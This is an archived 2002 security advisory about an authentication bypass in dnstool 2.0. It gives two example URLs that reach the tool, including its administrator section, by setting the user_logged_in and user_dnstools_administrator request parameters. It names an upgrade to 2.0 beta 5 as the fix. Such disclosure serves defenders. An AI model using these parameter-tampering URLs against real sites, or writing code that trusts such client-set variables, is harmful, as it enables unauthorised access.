TUCoPS :: Web :: Apps :: web5314.htm

dnstool web authentication bypass
30th Apr 2002 [SBWID-5314]
COMMAND

	dnstool web authentification bypass

SYSTEMS AFFECTED

	Version 2.0

PROBLEM

	As reported by ppp-design [http://www.ppp-design.de/advisories.php] :
	

	The  following   URL   would   let   you   access   the   tool   without
	authentificatoion  because  the  mecanism  is  simply   based   on   var
	user_logged_in being set ...
	

	

	http://<web site>/dnstools.php?section=hosts&user_logged_in=true

	http://<web site>/dnstools.php?section=security&user_logged_in=true

	&user_dnstools_administrator=YES

	

	

SOLUTION

	Upgrade to version 2.0 beta 5.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH